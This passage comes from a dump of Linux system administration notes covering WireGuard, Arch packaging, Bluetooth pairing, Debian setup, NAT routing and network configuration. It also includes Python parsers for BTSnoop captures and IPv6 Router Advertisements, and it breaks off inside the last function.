kernel.randomize_va_space = 2

# Restrict Magic SysRq to control keyboard, sync, RO-remount and reboot/poweroff
# To completely disable SysRq, set this value to zero
kernel.sysrq = 180
--------------------------------------------------------------------------------
/etc/wireguard.rst:
--------------------------------------------------------------------------------
``etc/wireguard/``: WireGuard VPN
=================================

Installation
------------

Installing WireGuard is quite simple.
It is documented in several places:

* For Arch Linux: https://wiki.archlinux.org/index.php/WireGuard

  .. code-block:: sh

      pacman -S wireguard-dkms wireguard-tools

* For Debian: https://www.linode.com/docs/networking/vpn/set-up-wireguard-vpn-on-debian/

  .. code-block:: sh

      # Add unstable repository with a low priority (the default one is 500)
      echo "deb http://deb.debian.org/debian/ unstable main" > /etc/apt/sources.list.d/unstable-wireguard.list
      printf 'Package: *\nPin: release a=unstable\nPin-Priority: 150\n' > /etc/apt/preferences.d/limit-unstable
      apt-get update && apt-get install wireguard-dkms wireguard-tools

* For Fedora: https://www.wireguard.com/install/

  .. code-block:: sh

      dnf copr enable jdoss/wireguard
      dnf install wireguard-dkms wireguard-tools


Configuration
-------------

In order to generate the private key of a host, as ``root``:

.. code-block:: sh

    cd /etc/wireguard
    (umask 277 && wg genkey | tee privatekey | wg pubkey > publickey)

An optional pre-shared key can also be generated:

.. code-block:: sh

    (umask 277 && wg genpsk > /etc/wireguard/psk)

In order to configure an interface for the server:

.. code-block:: sh

    ip link add dev wg0 type wireguard
    ip addr add 10.0.0.1/32 dev wg0
    ip addr add fd12:3456:789a::1/128 dev wg0
    wg set wg0 listen-port 51820 private-key /etc/wireguard/privatekey
    wg set wg0 peer ${CLIENT_PUBKEY} persistent-keepalive 25 \
        preshared-key /etc/wireguard/psk \
        allowed-ips 10.0.0.2/32,fd12:3456:789a::2/128
    ip link set wg0 up

    # Save the configuration
    (umask 077 && wg showconf wg0 > /etc/wireguard/wg0.conf)

    # In order to restore the configuration:
    wg setconf wg0 /etc/wireguard/wg0.conf

The configuration file for interface ``wg0``, ``/etc/wireguard/wg0.conf``, can also be directly written like this:

.. code-block:: ini

    [Interface]
    Address = 10.0.0.1/32, fd12:3456:789a::1/128
    ListenPort = 51820
    PrivateKey =
    SaveConfig = true

    [Peer]
    PublicKey =
    PresharedKey =
    AllowedIPs = 10.0.0.2/32,fd12:3456:789a::2/128
    PersistentKeepalive = 25

On the client, the configuration is similar, and the server is configured with an additional ``endpoint`` parameter:

.. code-block:: sh

    wg set wg0 peer ${SERVER_PUBKEY} persistent-keepalive 25 \
        allowed-ips 10.0.0.1/32 endpoint ${SERVER_ADDR}:51820
    # In the configuration file: Endpoint = ${SERVER_ADDR}:51820

If the VPN endpoint is allowed to route packets to the external network interface ``eth0``, this firewall configuration needs to be applied on the server:

.. code-block:: sh

    iptables -A FORWARD -i wg0 -o eth0 -j ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    ip6tables -A FORWARD -i wg0 -o eth0 -j ACCEPT
    ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Then, in order to start WireGuard, run as ``root``:

.. code-block:: sh

    wg-quick up wg0
    systemctl enable wg-quick@wg0

    # To shut down an interface:
    wg-quick down wg0

To display WireGuard status:

.. code-block:: sh

    wg
    wg show


Disabling NetworkManager
------------------------

In order to disable NetworkManager for the interface, write into ``/etc/NetworkManager/conf.d/unmanaged.conf``:

.. code-block:: ini

    [keyfile]
    unmanaged-devices=interface-name:wg0


Listening on a DNS port used by a DNS server
--------------------------------------------

WireGuard listens on all available IP addresses (it is designed this way, according to https://lists.zx2c4.com/pipermail/wireguard/2019-March/003938.html).
If another service is bound to the loopback on the port configured for WireGuard, starting interface ``wg0`` fails, with the following kernel logs::

    wireguard: wg0: Could not create IPv4 socket
    A link change request failed with some changes committed already.
    Interface wg0 may have been left with an inconsistent configuration, please check.

This occurs for example when trying to listen on 192.0.2.42:53 (UDP) while a DNS resolver is running on 127.0.0.1:53.
A possible workaround uses the firewall to solve this issue:

* Configure WireGuard to listen on another port (e.g. UDP 5353, which is used for multicast DNS)
* Redirect port 53 to 5353 for incoming traffic:

  .. code-block:: sh

      # Allow incoming connections
      nft add rule inet filter input 'udp dport {53, 5353} counter accept comment "accept WireGuard on DNS ports"'
      nft add rule inet filter output 'udp sport {53, 5353} counter accept comment "accept WireGuard on DNS ports"'

      # Load NAT module
      nft add table nat
      nft add chain nat prerouting '{ type nat hook prerouting priority 0 ; }'
      nft add chain nat postrouting '{ type nat hook postrouting priority 100 ; }'

      # Redirect module has been available since Linux Kernel 3.19.
      nft add rule nat prerouting ip daddr 192.0.2.42 udp dport 53 counter redirect to 5353

* Here is an example configuration file for the nftables firewall:

  .. code-block:: text

      table inet filter {
          chain input {
              type filter hook input priority 0; policy accept;
              # ...
              udp dport 53 counter accept comment "accept WireGuard on DNS port"
              udp dport 5353 counter accept comment "accept WireGuard on mDNS port"
              # ...
          }
          chain output {
              type filter hook output priority 0; policy accept;
              # ...
              udp sport 53 counter accept comment "accept WireGuard on DNS port"
              udp sport 5353 counter accept comment "accept WireGuard on mDNS port"
          }
      }
      table nat {
          chain prerouting {
              type nat hook prerouting priority 0; policy accept;
              ip daddr 192.0.2.42 udp dport 53 counter redirect to 5353 comment "WireGuard redirect"
          }
          chain postrouting {
              type nat hook postrouting priority 100; policy accept;
          }
      }
--------------------------------------------------------------------------------
/index.rst:
--------------------------------------------------------------------------------
.. Sphinx index file

Generic Configuration
=====================

If it's the first time you come here, you may want to read the
:doc:`README` before continuing.
8 | 9 | Contents: 10 | 11 | .. toctree:: 12 | :maxdepth: 2 13 | 14 | sysadmin/index 15 | database/index 16 | etc/index 17 | etc-desktop/index 18 | etc-server/index 19 | www/index 20 | windows/index 21 | README 22 | 23 | Github link: https://github.com/fishilico/generic-config 24 | -------------------------------------------------------------------------------- /sysadmin/archlinux-pkg.rst: -------------------------------------------------------------------------------- 1 | Notes about Arch Linux packages 2 | =============================== 3 | 4 | Here are some notes about Arch Linux packages. 5 | 6 | Building packages 7 | ----------------- 8 | 9 | Arch Linux packages can be found in two main places: official repositories and 10 | Arch User Repository (AUR). Official repositories are managed throw the Arch 11 | Build System (ABS). Users interact with them thanks to ``pacman``. AUR is 12 | managed by users and only contain sources, not binary packages. 13 | 14 | To build a package, you need to install ``base-devel`` and use ``makepkg``. 15 | The main component of a package is the ``PKGBUILD`` description file, which 16 | describes where to download sources and how to compile binary files. Once you 17 | have a ``PKGBUILD`` (and additional files such as patches) in a directory, 18 | to build and install the package you just need to issue:: 19 | 20 | makepkg -si 21 | 22 | ``-s`` option means *install missing dependencies using pacman*. 23 | ``-i`` option means *install the package after it is built*. 24 | 25 | You should customize your ``/etc/makepkg.conf`` file before launching the build, 26 | for example to set up the packager name: 27 | 28 | .. code-block:: sh 29 | 30 | PACKAGER="Myself " 31 | 32 | It is also possible to enable parallel build and to use a temporary build directory 33 | 34 | .. 
code-block:: sh 35 | 36 | cat >> /etc/makepkg.conf << EOF 37 | MAKEFLAGS="-j4" # According to $(nproc) 38 | BUILDDIR=/tmp/makepkg 39 | EOF 40 | cat >> /etc/fstab << EOF 41 | makepkg /tmp/makepkg tmpfs defaults,auto,nodev,nosuid,exec,gid=100,uid=1000,mode=0700 0 0 42 | EOF 43 | 44 | For more information read the wiki! Here are some links: 45 | 46 | - https://wiki.archlinux.org/index.php/Arch_Build_System 47 | - https://wiki.archlinux.org/index.php/AUR 48 | - https://wiki.archlinux.org/index.php/makepkg 49 | - https://wiki.archlinux.org/index.php/Official_Repositories 50 | - https://wiki.archlinux.org/index.php/Pacman_Tips 51 | - https://wiki.archlinux.org/index.php/PKGBUILD 52 | - https://wiki.archlinux.org/index.php/Yaourt 53 | 54 | 55 | Yaourt, pacaur and trizen 56 | ------------------------- 57 | 58 | ``yaourt`` (Yet AnOther User Repository Tool), ``pacaur`` and ``trizen`` ease the 59 | installation of packages from the AUR. Their interfaces are similar to 60 | ``pacman`` but they can download, build and install user packages too, wrapping 61 | both ``makepkg`` and ``pacman``. 62 | 63 | ``yaourt`` includes ``-G`` option (``--getpkgbuild``) to get a ``PKGBUILD`` file 64 | for a specified package. 65 | 66 | ``pacaur`` main advantage lies in keeping the downloaded PKGBUILD and their git 67 | history in a directory, ``$HOME/.cache/pacaur/``, which allows tracking changes 68 | when upgrading AUR packages. 69 | 70 | ``trizen`` is a more recent one and can replace ``pacaur``. 71 | 72 | 73 | Debug build 74 | ----------- 75 | 76 | To build packages with debug symbols, you need to change ``OPTIONS`` variable 77 | in ``/etc/makepkg.conf``. 
Here is the default configuration::

    OPTIONS=(strip docs !libtool !staticlibs emptydirs zipman purge !upx !debug)

You just need to add and remove some bangs according to your needs::

    OPTIONS=(!strip docs !libtool !staticlibs emptydirs zipman purge !upx debug)
-------------------------------------------------------------------------------- /sysadmin/bluetooth.rst: --------------------------------------------------------------------------------
Bluetooth on Linux
==================

Introduction
------------

Bluetooth is a protocol that can be used to communicate between two devices that are paired together.
It can be used to connect wireless devices (keyboard, mouse, speakers, etc.), to transmit files (with OBEX, for Object Exchange) and even to share Internet connectivity (using BNEP, the Bluetooth Network Encapsulation Protocol, which uses an L2CAP channel to transmit IP packets).
The protocol has been developed since at least 1989 and Bluetooth has been standardised as IEEE 802.15.1.
It operates with UHF radio waves, between 2.400 and 2.485 GHz.
More information can be found on its Wikipedia page: https://en.wikipedia.org/wiki/Bluetooth

On Linux, several steps need to be performed in order to use Bluetooth:

* Install the packages that provide the Bluetooth service and programs: ``bluez`` and ``bluez-utils``
* Unblock the radio interface, if it has been blocked:

  .. code-block:: sh

      rfkill unblock bluetooth

* Start the service:

  .. code-block:: sh

      systemctl start bluetooth.service

* Start a ``bluetoothctl`` CLI and power the device on by issuing ``power on``.

It is possible to record the Bluetooth communications using the monitor, ``btmon -w file.bt``.
This command produces BTSnoop files that can be opened for example in Wireshark.
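
As an added example (this is not code from the page, nor from BlueZ), here is a small Python reader for the BTSnoop files written by ``btmon -w``, which lets a capture be checked and summarised without Wireshark. The layout it parses is the one of the BTSnoop format (a 16-byte file header, then one 24-byte header per record, all integers big-endian); the mapping of the Linux monitor opcodes stored in the flags field follows BlueZ's ``btsnoop.h``. The two-record capture at the bottom is constructed for this example.

```python
"""Minimal BTSnoop reader, added as an example (not part of the original page).

BTSnoop file layout: magic "btsnoop\\0", u32 version (1), u32 datalink type,
then records: u32 original length, u32 included length, u32 flags,
u32 cumulative drops, s64 timestamp (microseconds since year 0), data.
"""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

BTSNOOP_MAGIC = b"btsnoop\0"
# Timestamps count microseconds from year 0; subtracting this gives Unix time
BTSNOOP_EPOCH_DELTA_US = 0x00DCDDB30F2F8000
DATALINK_LINUX_MONITOR = 2001   # what btmon writes; 1001/1002 are plain HCI
# Opcodes stored in the flags field by the Linux monitor datalink
MONITOR_OPCODES = {0: "new index", 1: "del index", 2: "command", 3: "event",
                   4: "ACL TX", 5: "ACL RX", 6: "SCO TX", 7: "SCO RX"}


@dataclass
class Record:
    timestamp_us: int   # microseconds since the Unix epoch
    flags: int
    drops: int          # cumulative number of dropped packets
    data: bytes
    description: str


def describe_flags(datalink: int, flags: int) -> str:
    """Turn the per-record flags into text, depending on the datalink type."""
    if datalink == DATALINK_LINUX_MONITOR:
        index, opcode = flags >> 16, flags & 0xFFFF
        return "hci%d %s" % (index, MONITOR_OPCODES.get(opcode, "opcode %#x" % opcode))
    # Plain HCI datalinks: bit 0 is the direction, bit 1 command/event vs data
    direction = "received" if flags & 1 else "sent"
    kind = "command/event" if flags & 2 else "data"
    return "%s %s" % (direction, kind)


def parse_btsnoop(blob: bytes) -> Tuple[int, List[Record]]:
    """Return (datalink type, records); raise ValueError on a malformed file."""
    if blob[:8] != BTSNOOP_MAGIC:
        raise ValueError("not a BTSnoop file")
    version, datalink = struct.unpack(">II", blob[8:16])
    if version != 1:
        raise ValueError("unsupported BTSnoop version %d" % version)
    records, pos = [], 16
    while pos < len(blob):
        if pos + 24 > len(blob):
            raise ValueError("truncated record header at offset %d" % pos)
        _orig_len, incl_len, flags, drops, ts = struct.unpack(">IIIIq", blob[pos:pos + 24])
        pos += 24
        data = blob[pos:pos + incl_len]
        if len(data) != incl_len:
            raise ValueError("truncated record data at offset %d" % pos)
        pos += incl_len
        records.append(Record(ts - BTSNOOP_EPOCH_DELTA_US, flags, drops, data,
                              describe_flags(datalink, flags)))
    return datalink, records


def summarize(records: List[Record]) -> Dict[str, int]:
    """Count records per description, e.g. {'hci0 command': 1, 'hci0 event': 1}."""
    counts: Dict[str, int] = {}
    for rec in records:
        counts[rec.description] = counts.get(rec.description, 0) + 1
    return counts


def validate(blob: bytes) -> Optional[str]:
    """Return None for a well-formed capture, or the error message."""
    try:
        parse_btsnoop(blob)
    except ValueError as exc:
        return str(exc)
    return None


def _record(flags: int, unix_us: int, data: bytes) -> bytes:
    return struct.pack(">IIIIq", len(data), len(data), flags, 0,
                       unix_us + BTSNOOP_EPOCH_DELTA_US) + data


# Constructed sample: an HCI Reset command on hci0 and its Command Complete event
SAMPLE_CAPTURE = (BTSNOOP_MAGIC + struct.pack(">II", 1, DATALINK_LINUX_MONITOR)
                  + _record((0 << 16) | 2, 1_600_000_000_000_000, bytes.fromhex("030c00"))
                  + _record((0 << 16) | 3, 1_600_000_000_001_000, bytes.fromhex("0e0401030c00")))

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CAPTURE
    link, recs = parse_btsnoop(blob)
    print("datalink %d, %d records: %s" % (link, len(recs), summarize(recs)))
```

Run it with the path of a ``btmon -w`` file as argument, or without argument to parse the constructed sample; the truncation checks matter because a capture cut short by an interrupted ``btmon`` otherwise yields a silently incomplete last record.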


Connecting an Android phone to a laptop using Bluetooth
-------------------------------------------------------

Here is a trace on a laptop that gets paired with an Android phone via Bluetooth (``[bluetooth]#`` is the user prompt):

.. code-block:: sh

    $ bluetoothctl
    [CHG] Controller 01:23:45:67:89:AB Pairable: yes

    [bluetooth]# power on
    [CHG] Controller 01:23:45:67:89:AB Class: 0x0000010c
    Changing power on succeeded
    [CHG] Controller 01:23:45:67:89:AB Powered: yes

    [bluetooth]# scan on
    [NEW] Device 55:44:33:22:11:00 AndroidPhone

    [bluetooth]# devices
    Device 55:44:33:22:11:00 AndroidPhone

    [bluetooth]# pair 55:44:33:22:11:00
    Attempting to pair with 55:44:33:22:11:00
    [CHG] Device 55:44:33:22:11:00 Connected: yes
    Request confirmation
    [agent] Confirm passkey 123123 (yes/no): yes
    [CHG] Device 55:44:33:22:11:00 Modalias: bluetooth:v0075p0100d0201
    [CHG] Device 55:44:33:22:11:00 UUIDs: 00001105-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 0000110e-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 00001112-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 00001115-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 00001116-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 0000111f-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 0000112d-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 0000112f-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 00001132-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 00001200-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 00001800-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: 00001801-0000-1000-8000-00805f9b34fb
    [CHG] Device 55:44:33:22:11:00 UUIDs: a23d00bc-217c-123b-9c00-fc44577136ee
    [CHG] Device 55:44:33:22:11:00 ServicesResolved: yes
    [CHG] Device 55:44:33:22:11:00 Paired: yes
    Pairing successful
    [CHG] Device 55:44:33:22:11:00 ServicesResolved: no
    [CHG] Device 55:44:33:22:11:00 Connected: no

    [bluetooth]# info 55:44:33:22:11:00
    Device 55:44:33:22:11:00 (public)
        Name: AndroidPhone
        Alias: AndroidPhone
        Class: 0x005a020c
        Icon: phone
        Paired: yes
        Trusted: no
        Blocked: no
        Connected: no
        LegacyPairing: no
        UUID: OBEX Object Push          (00001105-0000-1000-8000-00805f9b34fb)
        UUID: Audio Source              (0000110a-0000-1000-8000-00805f9b34fb)
        UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b34fb)
        UUID: A/V Remote Control        (0000110e-0000-1000-8000-00805f9b34fb)
        UUID: Headset AG                (00001112-0000-1000-8000-00805f9b34fb)
        UUID: PANU                      (00001115-0000-1000-8000-00805f9b34fb)
        UUID: NAP                       (00001116-0000-1000-8000-00805f9b34fb)
        UUID: Handsfree Audio Gateway   (0000111f-0000-1000-8000-00805f9b34fb)
        UUID: SIM Access                (0000112d-0000-1000-8000-00805f9b34fb)
        UUID: Phonebook Access Server   (0000112f-0000-1000-8000-00805f9b34fb)
        UUID: Message Access Server     (00001132-0000-1000-8000-00805f9b34fb)
        UUID: PnP Information           (00001200-0000-1000-8000-00805f9b34fb)
        UUID: Generic Access Profile    (00001800-0000-1000-8000-00805f9b34fb)
        UUID: Generic Attribute Profile (00001801-0000-1000-8000-00805f9b34fb)
        UUID: Vendor specific           (a23d00bc-217c-123b-9c00-fc44577136ee)
        Modalias: bluetooth:v0075p0100d0201

The passkey displayed by both devices has to be compared before answering ``yes``: this numeric comparison is what protects Secure Simple Pairing against a device in the middle.

The information about the pairing (for example the encryption and signature keys for messages) can be extracted from ``/var/lib/bluetooth/01:23:45:67:89:AB/55:44:33:22:11:00/info``.
As these keys allow impersonating and eavesdropping on the paired device, the ``/var/lib/bluetooth`` directory must stay readable only by ``root``.

When using NetworkManager, a Bluetooth interface can be configured in order to use the phone's Internet connection wirelessly.
This produces a BNEP interface (Bluetooth Network Encapsulation Protocol) named for example ``bnep0``, on which a DHCP client can be used in order to get the IPv4 network configuration.
This can cause the following message to appear in ``bluetoothctl``::

    Authorize service
    [agent] Authorize service 0000000f-0000-1000-8000-00805f9b34fb (yes/no): yes
    [AndroidPhone]#

This UUID matches the BNEP service and is needed in order to exchange data.
Such a UUID can be searched for in the bluez header files, such as https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/uuid.h?h=5.51
-------------------------------------------------------------------------------- /sysadmin/debian.rst: --------------------------------------------------------------------------------
Some information about Debian systems
=====================================

This document describes some configuration customizations and other sysadmin
tasks I do when I set up a Debian host.


Debian post-installation commands
---------------------------------

``dpkg-reconfigure locales``
    Reconfigure locales, for example to ``en_US en_US.UTF-8 fr_FR.UTF-8 fr_FR@euro``.
    Keep in mind that SSH preserves the locale across the connection, so a single UTF-8
    locale is not enough.

``dpkg-reconfigure console-data && dpkg-reconfigure keyboard-configuration``
    Change which keyboard configuration to use. ``loadkeys`` can also be used,
    with keymaps in ``/usr/share/kbd/keymaps``.
    After this: ``service keyboard-setup restart``.

``cd /usr/bin && sudo ln -s python python2``
    For scripts which require the ``python2`` command.

``update-rc.d $SERVICE remove`` or ``sysv-rc-conf``
    Remove some unneeded services from boot. The opposite operation is ``defaults``.

Enable persistent iptables configuration:

.. code-block:: sh

    apt-get install iptables-persistent
    systemctl enable netfilter-persistent.service

Or persistent nftables configuration:

.. code-block:: sh

    systemctl enable nftables.service


APT configuration
-----------------

This configuration doesn't install recommended packages by default.

``/etc/apt/apt.conf``::

    APT::Install-Recommends "0";
    APT::Install-Suggests "0";

To configure an HTTP proxy, you need to add one more line::

    Acquire::http::Proxy "http://proxy.example.com:8080/";

The ``/etc/apt/sources.list`` file depends on your location::

    # Here is this file for a Debian Unstable in the US.
    deb http://http.us.debian.org/debian/ sid main contrib non-free
    deb-src http://http.us.debian.org/debian/ sid main contrib non-free

    # And here for a Debian Squeeze server in Germany
    deb http://ftp.de.debian.org/debian squeeze main contrib non-free
    deb http://ftp.de.debian.org/debian-security squeeze/updates main contrib non-free

You may install the ``debsums`` package to check the integrity of the installed
files. Note that it compares the files with the MD5 sums shipped in the packages,
which are stored on the same host, so it catches accidental changes rather than a
deliberate compromise. There is a cron job for ``debsums`` which is configured by
``/etc/default/debsums``::

    # Set this to never to disable the checksum verification or
    # one of "daily", "weekly", "monthly" to enable it
    CRON_CHECK=never

Apticron is a program which automatically downloads the new updates (without
installing them) and sends mails about them. By default, it is configured to run
every day.
To change this to a weekly period, you need to edit
``/etc/cron.d/apticron``::

    # Sunday, 0:41
    41 0 * * 0 root if test -x /usr/sbin/apticron; then /usr/sbin/apticron --cron; else true; fi


Apache commands
---------------

``a2dismod status``
    Disable the status module.

``a2dissite default``
    Disable the default site; you need to write your own site file and enable it.


Postfix configuration
---------------------

To send system messages by email, it is a good idea to have a mail server on a
host which is configured as an "Internet Site". On a Debian host, Postfix seems
to be a good choice and is easy to install, configure and manage.

Reload the aliases after any change in ``/etc/aliases``::

    postalias /etc/aliases || newaliases
    postfix reload

``/etc/aliases`` example::

    root: root@example.com
    postmaster: root
    abuse: root
    user: root
    web: web@example.com
    www: web

The name of the mail system is written down in ``/etc/mailname``.
-------------------------------------------------------------------------------- /sysadmin/index.rst: --------------------------------------------------------------------------------
Some notes and tips&tricks about system administration
======================================================

.. toctree::
   :maxdepth: 2
   :glob:

   *
-------------------------------------------------------------------------------- /sysadmin/nat.rst: --------------------------------------------------------------------------------
Linux NAT router
================

This document presents some commands to configure a Linux NAT router in an IPv4
network.
*NAT* means Network Address Translation and has been designed to
provide Internet connectivity when there is only a limited number of addresses
assigned to a network.

Network architecture
--------------------

For the sake of clarity, this document uses the following interface names and
network addresses::

                    +--------------------------------+
                    |            Linux               |      Private Network
    Internet -------| eth0       Router         eth1 |-----  (Wifi, VPN...)
                    | 192.0.2.42          10.13.37.1 |       10.13.37.0/24
                    +--------------------------------+             |
                                                                   |
                                                              +---------+
                                                              | Private |
                                                              |  Host   |
                                                              +---------+

Hosts connected to the private network don't have public IPv4 addresses and are
configured to connect to the Internet via a router sitting at ``10.13.37.1``.

To configure the router so that the private host gets access to the Internet,
you need to issue the following commands on the Linux router:

* Configure the firewall to do NAT::

      # If the public address (192.0.2.42) is static, use this command
      iptables -t nat -A POSTROUTING -s 10.13.37.0/24 -o eth0 -j SNAT --to-source 192.0.2.42

      # Otherwise, if the public address is dynamic, use this command
      iptables -t nat -A POSTROUTING -s 10.13.37.0/24 -o eth0 -j MASQUERADE

* Configure the firewall to allow packet forwarding::

      iptables -A FORWARD -s 10.13.37.0/24 -i eth1 -o eth0 -j ACCEPT
      iptables -A FORWARD -d 10.13.37.0/24 -i eth0 -o eth1 -j ACCEPT

  The second rule lets any packet coming from the Internet reach the private
  network; to only let replies through, restrict it with
  ``-m conntrack --ctstate ESTABLISHED,RELATED``.

* Enable packet forwarding via sysctl (``sysctl -w`` writes to ``/proc/sys/...``)::

      sysctl -w net.ipv4.conf.eth0.forwarding=1
      sysctl -w net.ipv4.conf.eth1.forwarding=1

      # Previous entries may not exist in old kernels. In such a case, use:
      # sysctl -w net.ipv4.ip_forward=1
      # ... which acts like: sysctl -w net.ipv4.conf.all.forwarding=1


Persistent configuration
------------------------

You may create the following files to write your configuration in a way that is kept
across reboots.

``/etc/iptables/iptables.rules`` (please adapt this path according to your Linux
distribution)::

    *filter
    :INPUT DROP [0:0]
    :FORWARD DROP [0:0]
    :OUTPUT DROP [0:0]
    # (... INPUT and OUTPUT filters ...)
    -A FORWARD -s 10.13.37.0/24 -i eth1 -o eth0 -j ACCEPT
    -A FORWARD -d 10.13.37.0/24 -i eth0 -o eth1 -j ACCEPT
    COMMIT

    *nat
    :PREROUTING ACCEPT [0:0]
    :POSTROUTING ACCEPT [0:0]
    :OUTPUT ACCEPT [0:0]
    -A POSTROUTING -s 10.13.37.0/24 -o eth0 -j SNAT --to-source 192.0.2.42
    COMMIT


``/etc/sysctl.d/ip_forward.conf`` (or ``/etc/sysctl.conf`` on old systems)::

    net.ipv4.conf.eth0.forwarding=1
    net.ipv4.conf.eth1.forwarding=1
-------------------------------------------------------------------------------- /sysadmin/netconfig.rst: --------------------------------------------------------------------------------
Network configuration
=====================

This short document is a quick reference to some commands you would like to
know when you're connecting to a network and asking "What's the conf, here?"
If there is a kind of "automatic configuration" taking place, you may want to
know what information the network is giving you. Otherwise, you need to
know how to set up a manual configuration by hand.


IPv4 configuration
------------------
Automatic IPv4 configuration is quite straightforward: run a DHCP client!
For example, to discover a DHCP server on the ``eth0`` interface::

    dhclient eth0
    # or
    dhcpcd eth0

Static IPv4 configuration can be achieved thanks to the ``ip`` command::

    ip addr add 192.168.0.42/24 dev eth0
    ip route add default via 192.168.0.1 dev eth0

This presupposes that you know what IP address your gateway uses. Without this
knowledge, you need to sniff and/or scan the network to find it.


IPv6 configuration
------------------
Automatic IPv6 configuration is more straightforward than IPv4: it is done by
the kernel and you have nothing to do! Sometimes you may want to ignore the
automatic configuration. This command disables it on ``eth0``::

    sysctl -w net.ipv6.conf.eth0.accept_ra=0

Automatic configuration works because when a host sends a Router Solicitation
message (ICMPv6 type 133), the gateways answer with a Router Advertisement
(ICMPv6 type 134) containing information similar to DHCP. As Router
Advertisements are not authenticated, any host on the link can send them and
become the default router of its neighbours; this is one reason to disable
``accept_ra`` on hosts with a static configuration. To send an RS by hand,
install the ``ndisc6`` package and run::

    rdisc6 eth0

Like with IPv4, static IPv6 can be configured with the ``ip`` command::

    ip addr add 2001:db8::42/64 dev eth0
    ip -6 route add default via 2001:db8::1 dev eth0

However, unlike IPv4, there is a smart way to find the gateway: multicast. More
precisely, IPv6 defines ``ff02::2`` as a multicast address for all
routers on a link (a Linux machine answers as a router when
``net.ipv6.conf.all.forwarding`` is 1).

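
To see exactly what a Router Advertisement gives a host, here is an added example (not code from the page nor from ``ndisc6``): a Python parser for the ICMPv6 type 134 message, following the RFC 4861 header and option layout and the RFC 8106 RDNSS option, with a check that compares the advertised router and resolvers against what is expected on the link. The sample advertisement is constructed for this example; feeding it real packets (from a raw ICMPv6 socket or a pcap) is left to the caller.

```python
"""Router Advertisement (ICMPv6 type 134) parser, added as an example; it is
not part of the original page. Input is the ICMPv6 payload, starting at the
type byte. The sample packet built by build_sample_ra() is constructed."""
import ipaddress
import struct
from typing import Any, Dict, Iterable, List

ICMPV6_ROUTER_ADVERTISEMENT = 134
OPT_SOURCE_LLADDR = 1     # RFC 4861 4.6.1
OPT_PREFIX_INFO = 3       # RFC 4861 4.6.2
OPT_MTU = 5               # RFC 4861 4.6.4
OPT_RDNSS = 25            # RFC 8106 5.1


def parse_router_advertisement(payload: bytes, src: str) -> Dict[str, Any]:
    """Decode the RA header and its options; src is the sender's link-local address."""
    if len(payload) < 16:
        raise ValueError("RA too short")
    icmp_type, code, _csum, hop_limit, flags, lifetime, _reach, _retrans = \
        struct.unpack(">BBHBBHII", payload[:16])
    if icmp_type != ICMPV6_ROUTER_ADVERTISEMENT or code != 0:
        raise ValueError("not a Router Advertisement")
    ra: Dict[str, Any] = {
        "router": src,
        "hop_limit": hop_limit,
        "managed": bool(flags & 0x80),    # M: addresses come from DHCPv6
        "other": bool(flags & 0x40),      # O: other information from DHCPv6
        "router_lifetime": lifetime,      # 0 means "not a default router"
        "prefixes": [], "mtu": None, "dns_servers": [], "source_mac": None,
    }
    pos = 16
    while pos < len(payload):
        if pos + 2 > len(payload):
            raise ValueError("truncated option header")
        opt_type, opt_len8 = payload[pos], payload[pos + 1]
        if opt_len8 == 0:
            raise ValueError("zero-length option")   # RFC 4861: must be discarded
        opt_len = opt_len8 * 8                       # length is in 8-byte units
        body = payload[pos + 2:pos + opt_len]
        if len(body) != opt_len - 2:
            raise ValueError("truncated option")
        if opt_type == OPT_SOURCE_LLADDR and len(body) >= 6:
            ra["source_mac"] = ":".join("%02x" % b for b in body[:6])
        elif opt_type == OPT_PREFIX_INFO and len(body) == 30:
            plen, pflags, valid, preferred, _res, prefix = struct.unpack(">BBIII16s", body)
            ra["prefixes"].append({
                "prefix": "%s/%d" % (ipaddress.IPv6Address(prefix), plen),
                "on_link": bool(pflags & 0x80),
                "autonomous": bool(pflags & 0x40),   # A: SLAAC may use this prefix
                "valid": valid, "preferred": preferred,
            })
        elif opt_type == OPT_MTU and len(body) == 6:
            ra["mtu"] = struct.unpack(">HI", body)[1]
        elif opt_type == OPT_RDNSS and len(body) >= 22:
            # reserved(2) + lifetime(4), then one or more 16-byte addresses
            for off in range(6, len(body) - 15, 16):
                ra["dns_servers"].append(str(ipaddress.IPv6Address(body[off:off + 16])))
        pos += opt_len
    return ra


def check_against_expectations(ra: Dict[str, Any], expected_router_mac: str,
                               allowed_dns: Iterable[str]) -> List[str]:
    """Report an RA whose sender or resolvers differ from the known link setup."""
    findings = []
    if ra["source_mac"] and ra["source_mac"] != exp_lower(expected_router_mac):
        findings.append("RA from unexpected MAC %s" % ra["source_mac"])
    allowed = {str(ipaddress.IPv6Address(a)) for a in allowed_dns}
    for dns in ra["dns_servers"]:
        if dns not in allowed:
            findings.append("unexpected resolver %s" % dns)
    return findings


def exp_lower(mac: str) -> str:
    return mac.lower()


def build_sample_ra() -> bytes:
    """Constructed sample: a router advertising 2001:db8::/64, MTU 1500 and one resolver."""
    hdr = struct.pack(">BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64, 0x00, 1800, 0, 0)
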